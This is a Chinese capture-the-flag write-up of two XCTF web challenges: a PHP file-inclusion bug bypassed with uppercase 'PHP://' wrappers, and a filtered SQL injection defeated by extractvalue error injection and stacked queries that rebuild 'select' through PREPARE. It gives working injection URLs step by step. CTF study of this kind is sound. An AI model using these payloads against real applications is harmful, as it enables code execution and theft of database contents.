Web_php_include 和supersqli攻防世界xctf web

Web_php_include

代码


show_source(__FILE__);
echo $_GET['hello'];
$page=$_GET['page'];
while (strstr($page, "php://")) {
    $page=str_replace("php://", "", $page);//相当于过滤了php://
}
include($page);
?>

strstr() 函数搜索字符串在另一字符串中是否存在,如果是,返回该字符串及剩余部分,否则返回 FALSE。
注释:该函数是区分大小写的。(菜鸟教程)
所以可以用大写PHP绕过
这里已经提示是文件包含,可以利用这个漏洞
利用php伪协议,读取目录文件dir
Web_php_include 和supersqli攻防世界xctf web_第1张图片
可以利用post流,执行代码
读取第一个php文件
Web_php_include 和supersqli攻防世界xctf web_第2张图片
这个文件内容好像没有变的样子,实际改变了,打开F12,flag在注释里

supersqli

从题目和标签大致猜到是sql注入
1.提交原本有的值1,可以看到
在这里插入图片描述
打开F12
Web_php_include 和supersqli攻防世界xctf web_第3张图片
是get方式

2.1后加单引号’,报错

http://111.198.29.45:34455/?inject=1'

3.加注释符–+或#,不报错

http://111.198.29.45:34455/?inject=1%27--+

以上两步,基本确定是注入
检查是否存在过滤

4.输入select

http://111.198.29.45:34455/?inject=select

返回return preg_match("/select|update|delete|drop|insert|where|./i",$inject);
即过滤以上字符
所以使用extractvalue报错注入
5.爆版本

http://111.198.29.45:34455/?inject=-1%27%20and%20extractvalue(1,concat(1,version()))--+

回显:’.18-MariaDB’
6.爆数据库

http://111.198.29.45:34455/?inject=-1%27%20and%20extractvalue(1,concat(1,database()))--+

回显:supersqli

7.爆表名,因为这里过滤了select,所以使用点击堆叠注入

http://111.198.29.45:34455/?inject=-1%27;use%20supersqli;show%20tables;--+

爆出两个表名1919810931114514和words

8.爆表1919810931114514的列

http://111.198.29.45:34455/?inject=-1%27;use%20information_schema;set%20@sql=concat(%27s%27,%27elect%20column_name%20from%20columns%20wher%27,%27e%20table_name=%221919810931114514%22%27);PREPARE%20stmt1%20FROM%20@sql;EXECUTE%20stmt1;--+

得到列:flag
9.爆列flag的字段

http://111.198.29.45:34455/?inject=-1%27;use%20supersqli;set%20@sql=concat(%27s%27,%27elect%20`flag`%20from%20`1919810931114514`%27);PREPARE%20stmt1%20FROM%20@sql;EXECUTE%20stmt1;--+

得到flag
考点:过滤了select的注入
%20是空格,%27是单引号的url编码

你可能感兴趣的:(Web_php_include 和supersqli攻防世界xctf web)